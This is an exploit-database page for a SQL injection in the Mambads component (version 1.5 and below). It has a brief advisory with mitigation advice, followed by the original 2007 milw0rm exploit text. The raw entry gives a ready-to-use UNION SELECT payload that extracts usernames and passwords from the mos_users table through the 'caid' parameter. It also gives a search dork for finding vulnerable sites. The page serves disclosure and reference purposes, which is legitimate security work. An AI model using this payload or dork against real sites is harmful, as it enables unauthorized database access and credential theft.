header-logo
Suggest Exploit
vendor:
Mambads
by:
Sniper456
5.5
CVSS
MEDIUM
SQL Injection
89
CWE
Product Name: Mambads
Affected Version From: 1.5
Affected Version To: 1.5
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Mambads <= 1.5 Sql Injection

The Mambads version 1.5 and below is vulnerable to SQL injection. An attacker can inject malicious SQL code through the 'caid' parameter in the 'index.php?option=com_mambads&Itemid=0&func=detail&cacat=1&casb=1&caid=' URL. This can lead to unauthorized access to the database and potentially sensitive information leakage.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and use prepared statements or parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

######################################
# Mambads <= 1.5 Sql Injection       #
######################################


Autor:Sniper456 

Contact:Sniper456[at]gmail.kom

Greetss: PescaoDeth, Daemon21, Vampirin456, Shh-2, CodeBreak and the chilean People ;)



**SQL:
index.php?option=com_mambads&Itemid=0&func=detail&cacat=1&casb=1&caid=[inyecta maricon]


**Example:
index.php?option=com_mambads&Itemid=0&func=detail&cacat=1&casb=1&caid=999/**/Union/**/select/**/1,2,3,4,5,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20mos_users/*



Dork:  cuAck!, wena naaaty  xD   
         "inurl:com_mambads"


######################################

# Fro000M  chiLe my frieeeenD! 2007  #

######################################

# milw0rm.com [2007-09-29]

Navigation

Suggest Exploit

Services By CQR